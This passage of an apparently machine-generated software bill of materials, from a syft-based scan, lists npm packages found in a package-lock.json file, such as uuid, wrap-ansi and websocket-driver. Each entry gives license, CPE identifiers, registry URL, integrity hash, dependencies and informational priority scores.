syft-generated - cpe: cpe:2.3:a:utils_merge:utils-merge:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:utils_merge:utils_merge:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:utils:utils-merge:1.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:utils:utils_merge:1.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/utils-merge@1.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz integrity: sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 236364fea165c402 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: uuid 10.0.0' title: uuid 10.0.0 description: 'Package discovered: uuid 10.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 21b622d3d64a2c86 name: uuid version: 10.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:uuid:uuid:10.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/uuid@10.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz integrity: sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2fb790bc55d11030 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: uuid 8.3.2' title: uuid 8.3.2 description: 'Package discovered: uuid 8.3.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8cf0c19ede45d1bc name: uuid version: 8.3.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:uuid:uuid:8.3.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/uuid@8.3.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz integrity: sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 3e2f0913d0055c91 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: uuid 9.0.1' title: uuid 9.0.1 description: 'Package discovered: uuid 9.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0bd59342bab05265 name: uuid version: 9.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:uuid:uuid:9.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/uuid@9.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz integrity: sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4e3576c544465abd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: vary 1.1.2' title: vary 1.1.2 description: 'Package discovered: vary 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2fc27b955ce3ef5d name: vary version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:vary:vary:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/vary@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/vary/-/vary-1.1.2.tgz integrity: sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 60e43c65d8e9a8e6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: victory-vendor 36.9.2' title: victory-vendor 36.9.2 description: 'Package discovered: victory-vendor 36.9.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 14c55cee8eb4e77f name: victory-vendor version: 36.9.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT AND ISC spdxExpression: MIT AND ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:victory-vendor:victory-vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:victory-vendor:victory_vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:victory_vendor:victory-vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:victory_vendor:victory_vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:victory:victory-vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:victory:victory_vendor:36.9.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/victory-vendor@36.9.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/victory-vendor/-/victory-vendor-36.9.2.tgz integrity: sha512-PnpQQMuxlwYdocC8fIJqVXvkeViHYzotI+NJrCuav0ZYFoq912ZHBk3mCeuj+5/VpodOjPe1z0Fk2ihgzlXqjQ== dependencies: '@types/d3-array': ^3.0.3 '@types/d3-ease': ^3.0.0 '@types/d3-interpolate': ^3.0.1 '@types/d3-scale': ^4.0.2 '@types/d3-shape': ^3.1.0 '@types/d3-time': ^3.0.0 '@types/d3-timer': ^3.0.0 d3-array: ^3.1.6 d3-ease: ^3.0.1 d3-interpolate: ^3.0.1 d3-scale: ^4.0.2 d3-shape: ^3.1.0 d3-time: ^3.0.0 d3-timer: ^3.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a846a040ec49fd72 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: vite-compatible-readable-stream 3.6.1' title: vite-compatible-readable-stream 3.6.1 description: 'Package discovered: vite-compatible-readable-stream 3.6.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 874d0721c00b1770 name: vite-compatible-readable-stream version: 3.6.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:vite-compatible-readable-stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite-compatible-readable-stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible_readable_stream:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible_readable_stream:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/vite-compatible-readable-stream@3.6.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz integrity: sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ== dependencies: inherits: ^2.0.3 string_decoder: ^1.1.1 util-deprecate: ^1.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c6d0b110f80cc969 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: webidl-conversions 3.0.1' title: webidl-conversions 3.0.1 description: 'Package discovered: webidl-conversions 3.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 770e2f7ad3b1c524 name: webidl-conversions version: 3.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-2-Clause spdxExpression: BSD-2-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/webidl-conversions@3.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz integrity: sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c76cb0d14c517e35 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: websocket-driver 0.7.4' title: websocket-driver 0.7.4 description: 'Package discovered: websocket-driver 0.7.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 944bd0667b1458ca name: websocket-driver version: 0.7.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/websocket-driver@0.7.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz integrity: sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg== dependencies: http-parser-js: '>=0.5.1' safe-buffer: '>=5.1.0' websocket-extensions: '>=0.1.1' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: bb5b0fea2c384fe7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: websocket-extensions 0.1.4' title: websocket-extensions 0.1.4 description: 'Package discovered: websocket-extensions 0.1.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 6844e064384011a8 name: websocket-extensions version: 0.1.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/websocket-extensions@0.1.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz integrity: sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c0ee8f2bbf5fd4e3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: whatwg-url 5.0.0' title: whatwg-url 5.0.0 description: 'Package discovered: whatwg-url 5.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0827d54a7a5ea1e5 name: whatwg-url version: 5.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/whatwg-url@5.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz integrity: sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw== dependencies: tr46: ~0.0.3 webidl-conversions: ^3.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 10cad46c067a700f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: which 2.0.2' title: which 2.0.2 description: 'Package discovered: which 2.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 414763db2a64d1aa name: which version: 2.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/which@2.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/which/-/which-2.0.2.tgz integrity: sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA== dependencies: isexe: ^2.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 20ac7377e7b68a5f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: which-module 2.0.1' title: which-module 2.0.1 description: 'Package discovered: which-module 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e9c9cc83bf436fd2 name: which-module version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/which-module@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz integrity: sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9ffab25d563bb6a3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: wrap-ansi 6.2.0' title: wrap-ansi 6.2.0 description: 'Package discovered: wrap-ansi 6.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1fadca0371d5cfaf name: wrap-ansi version: 6.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/wrap-ansi@6.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz integrity: sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA== dependencies: ansi-styles: ^4.0.0 string-width: ^4.1.0 strip-ansi: ^6.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: '8455272704618757' ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: wrap-ansi 7.0.0' title: wrap-ansi 7.0.0 description: 'Package discovered: wrap-ansi 7.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 336621830c576ca4 name: wrap-ansi version: 7.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/wrap-ansi@7.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz integrity: sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q== dependencies: ansi-styles: ^4.0.0 string-width: ^4.1.0 strip-ansi: ^6.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 686325d7e763de93 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: wrap-ansi 8.1.0' title: wrap-ansi 8.1.0 description: 'Package discovered: wrap-ansi 8.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 49a7c54fcd626265 name: wrap-ansi version: 8.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/wrap-ansi@8.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz integrity: sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ== dependencies: ansi-styles: ^6.1.0 string-width: ^5.0.1 strip-ansi: ^7.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 20b8ef0a2e52c375 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: wrappy 1.0.2' title: wrappy 1.0.2 description: 'Package 